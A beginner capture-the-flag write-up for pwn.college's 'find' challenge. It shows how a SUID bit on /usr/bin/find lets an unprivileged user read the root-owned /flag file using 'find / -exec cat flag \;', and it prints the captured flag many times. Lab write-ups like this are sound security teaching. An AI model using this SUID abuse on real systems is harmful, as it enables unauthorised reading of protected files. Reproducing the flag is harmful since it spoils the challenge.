Challenge Name: find
Writeup from Program Misuse
Category: Program Misuse
Platform: pwn.college
Difficulty: Begineer
Date: 2025-07-15
Author: Himanshu Parate
π§ Summary:
The challenge abuses a SUID bit set on /usr/bin/find, allowing an unprivileged user to read the root-owned flag file at /flag.
π Enumeration
ls -l /usr/bin/find
output:
-rwsr-xr-x 1 root root 47480 Sep 5 2019 /usr/bin/find
-The s in -rws indicates itβs a SUID binary.
-find runs with root privileges.
π Exploitation
The find command in Linux is used to search for files and directories in a directory hierarchy based on name, size, type, time, permissions, and many other filters β and optionally run commands on them.
Thus we can simply run commnds for a file using find just like env.
find / -exec cat flag \;
Output:
pwn.college{MdG7ObAboj4LhSlCpd_R5KIgJEK.ddjNxwSM0IzMyEzW}
pwn.college{MdG7ObAboj4LhSlCpd_R5KIgJEK.ddjNxwSM0IzMyEzW}
pwn.college{MdG7ObAboj4LhSlCpd_R5KIgJEK.ddjNxwSM0IzMyEzW}
pwn.college{MdG7ObAboj4LhSlCpd_R5KIgJEK.ddjNxwSM0IzMyEzW}
pwn.college{MdG7ObAboj4LhSlCpd_R5KIgJEK.ddjNxwSM0IzMyEzW}
pwn.college{MdG7ObAboj4LhSlCpd_R5KIgJEK.ddjNxwSM0IzMyEzW}
pwn.college{MdG7ObAboj4LhSlCpd_R5KIgJEK.ddjNxwSM0IzMyEzW}
pwn.college{MdG7ObAboj4LhSlCpd_R5KIgJEK.ddjNxwSM0IzMyEzW}
pwn.college{MdG7ObAboj4LhSlCpd_R5KIgJEK.ddjNxwSM0IzMyEzW}
pwn.college{MdG7ObAboj4LhSlCpd_R5KIgJEK.ddjNxwSM0IzMyEzW}
pwn.college{MdG7ObAboj4LhSlCpd_R5KIgJEK.ddjNxwSM0IzMyEzW}
pwn.college{MdG7ObAboj4LhSlCpd_R5KIgJEK.ddjNxwSM0IzMyEzW}